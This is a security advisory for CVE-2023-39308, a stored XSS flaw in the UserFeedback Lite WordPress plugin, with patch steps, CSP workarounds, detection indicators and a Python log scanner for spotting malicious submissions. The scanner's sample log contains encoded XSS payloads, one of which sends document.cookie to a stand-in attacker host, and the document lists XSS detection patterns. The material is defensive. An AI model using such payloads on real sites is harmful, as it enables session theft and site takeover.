CVE-2023-39308

7.1 HIGH

📋 TL;DR

An unauthenticated stored cross-site scripting (XSS) vulnerability in the UserFeedback Lite WordPress plugin (versions 1.0.7 and earlier) lets any visitor submit feedback containing script. The payload is stored by the plugin and later executes in the browser of whoever views the affected page, such as an administrator reviewing submissions. No authentication is required, so the issue is reachable by any visitor to a site with the vulnerable plugin active.

💻 Affected Systems

Products:
  • WordPress UserFeedback Lite plugin
Versions: <= 1.0.7
Operating Systems: Any OS running WordPress
Default Config Vulnerable: ⚠️ Yes
Notes: Affects any WordPress installation with a vulnerable version of the plugin active; the hosting OS and web server are irrelevant.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴 Worst Case

Attackers steal administrator session cookies or perform actions in the administrator's browser session, take over accounts, deface the site, or redirect visitors to malicious sites, potentially leading to complete site compromise.

🟠 Likely Case

Attackers inject JavaScript that steals session cookies or credentials of users who view the stored payload, leading to unauthorized access to the WordPress admin panel.

🟢 If Mitigated

With the plugin patched (or disabled) and a Content Security Policy that blocks inline and untrusted scripts, injected markup cannot execute; the residual impact is limited to inert payloads stored in the feedback data handled by the vulnerable component.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

A public proof-of-concept demonstrates unauthenticated exploitation via the feedback submission form. Because the payload is stored, a single submission is enough; the attacker only has to wait for a privileged user to view it.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.0.8 or later

Vendor Advisory: https://wordpress.org/plugins/userfeedback-lite/#developers

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find the UserFeedback Lite plugin.
4. Click 'Update Now' if an update is offered.
5. If no update is offered, deactivate and delete the plugin, then install the current version from the WordPress plugin repository and confirm that the installed version is 1.0.8 or later.

🔧 Temporary Workarounds

Disable UserFeedback Plugin

Platform: all

Temporarily disable the vulnerable plugin until patched version is available.

wp plugin deactivate userfeedback-lite

Implement Content Security Policy

Platform: all

Add CSP headers to restrict script execution to trusted sources. The policy below forbids inline scripts, which is what blocks a stored `<script>` payload, but WordPress core, the admin dashboard and most themes rely on inline scripts, so an enforced policy this strict will break the site. Deploy it first as Content-Security-Policy-Report-Only, review the violation reports, and expect to loosen it before enforcing. The Apache directive requires mod_headers to be enabled.

Add to .htaccess: Header set Content-Security-Policy "default-src 'self'; script-src 'self'"
Add to nginx config: add_header Content-Security-Policy "default-src 'self'; script-src 'self'";

🧯 If You Can't Patch

  • Disable the UserFeedback plugin completely
  • Implement web application firewall rules to block XSS payloads in feedback submissions; treat this as a stopgap, since signature-based rules are routinely bypassed with encoding and alternative tags

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel > Plugins > Installed Plugins for UserFeedback Lite version 1.0.7 or earlier.

Check Version:

wp plugin get userfeedback-lite --field=version

Verify Fix Applied:

Verify plugin version is 1.0.8 or later in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

  • POST requests to /wp-admin/admin-ajax.php whose feedback fields contain script tags, event-handler attributes or javascript: URIs, including their URL-encoded forms
  • Several feedback submissions from the same source IP in a short window, each carrying a JavaScript payload (an attacker tuning a payload)

Network Indicators:

  • HTTP requests containing <script> tags in feedback form parameters, often URL- or HTML-entity-encoded, so decode before matching
  • Requests from administrators' browsers to unfamiliar external hosts shortly after viewing feedback submissions (cookie or token exfiltration by the executing payload)

SIEM Query:

source="wordpress.log" AND ("admin-ajax.php" AND "action=userfeedback" AND ("<script>" OR "javascript:" OR "onerror="))

This query matches literal strings only. Payloads are usually URL-encoded or HTML-entity-encoded and may vary case, so decode and lower-case the request before matching, or extend the terms with their encoded forms. Standard access logs do not record POST bodies; the query only works on logs that capture the request body, such as a WAF or ModSecurity audit log or application-level logging of the submission handler.
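The log indicators and SIEM query above, applied in code. This is an added example and is not part of the advisory or of the plugin: it reads a constructed JSON-lines request log (the field names, the `action=userfeedback` prefix taken from the SIEM query, and every sample entry are assumptions), decodes URL encoding and HTML entities before matching so that encoded payloads are not missed, and flags source IPs that sent more than one suspicious submission.

```python
"""Scan a request log for XSS payloads aimed at the UserFeedback submission endpoint.

Added example for CVE-2023-39308; not advisory or plugin code. The log format
(JSON lines with ts, ip, method, uri, body) and the action prefix are assumptions.
"""
from __future__ import annotations

import json
import re
from collections import Counter
from html import unescape
from urllib.parse import unquote_plus

# Indicator patterns: the advisory's terms plus common obfuscation forms. All case-insensitive.
XSS_INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(r"\bon(error|load|mouseover|focus|click)\s*=", re.I),
    "html_injection": re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I),
}

# Assumed endpoint and action prefix (taken from the advisory's SIEM query).
ENDPOINT = "/wp-admin/admin-ajax.php"
ACTION_RE = re.compile(r"(?:^|&)action=userfeedback", re.I)


def normalize(raw: str) -> str:
    """Undo URL-encoding twice (catches double-encoded payloads) and HTML entities,
    so literal pattern matching is not defeated by trivial encoding."""
    text = raw
    for _ in range(2):
        text = unquote_plus(text)
    return unescape(text)


def indicators_in(text: str) -> list[str]:
    """Names of the XSS indicators present in the decoded text, in dictionary order."""
    decoded = normalize(text)
    return [name for name, rx in XSS_INDICATORS.items() if rx.search(decoded)]


def is_feedback_submission(entry: dict) -> bool:
    """True for POSTs to the AJAX endpoint whose action (query string or body) is a userfeedback action."""
    if entry.get("method") != "POST" or ENDPOINT not in entry.get("uri", ""):
        return False
    query = entry["uri"].partition("?")[2]
    return bool(ACTION_RE.search(query) or ACTION_RE.search(entry.get("body", "")))


def scan(log_lines: list[str], repeat_threshold: int = 2) -> dict:
    """Return suspicious feedback submissions and the IPs that sent several of them."""
    hits = []
    for line in log_lines:
        entry = json.loads(line)
        if not is_feedback_submission(entry):
            continue
        found = indicators_in(entry.get("body", ""))
        if found:
            hits.append({"ts": entry["ts"], "ip": entry["ip"], "indicators": found})
    per_ip = Counter(h["ip"] for h in hits)
    repeat = sorted(ip for ip, n in per_ip.items() if n >= repeat_threshold)
    return {"hits": hits, "repeat_offenders": repeat}


# Constructed sample log. A WAF or ModSecurity audit log supplies request bodies;
# a plain access log does not, so the body field would be empty there.
SAMPLE_LOG = [
    '{"ts":"2023-08-01T10:00:01Z","ip":"203.0.113.5","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=userfeedback_submit&comment=Great+plugin%2C+thanks"}',
    '{"ts":"2023-08-01T10:00:07Z","ip":"198.51.100.9","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=userfeedback_submit&comment=%3Cscript%3Efetch(%27https://evil.example/c%3F%27%2Bdocument.cookie)%3C/script%3E"}',
    '{"ts":"2023-08-01T10:00:09Z","ip":"198.51.100.9","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=userfeedback_submit&comment=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E"}',
    '{"ts":"2023-08-01T10:00:12Z","ip":"192.0.2.44","method":"POST","uri":"/wp-admin/admin-ajax.php","body":"action=heartbeat&data=%3Cscript%3E"}',
    '{"ts":"2023-08-01T10:00:15Z","ip":"192.0.2.45","method":"GET","uri":"/wp-admin/admin-ajax.php?action=userfeedback_get_survey&id=1","body":""}',
]

if __name__ == "__main__":
    # Two hits, both from 198.51.100.9 (one plain, one double-encoded); the heartbeat
    # request with a script tag is ignored because it is not a feedback action.
    print(json.dumps(scan(SAMPLE_LOG), indent=2))
```

Run it as a script to print the findings. The pattern list is a starting point rather than a complete XSS signature set, and it will also fire on benign feedback that happens to quote HTML, so treat a hit as something to review, and weight repeat submissions from one IP higher.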

🔗 References
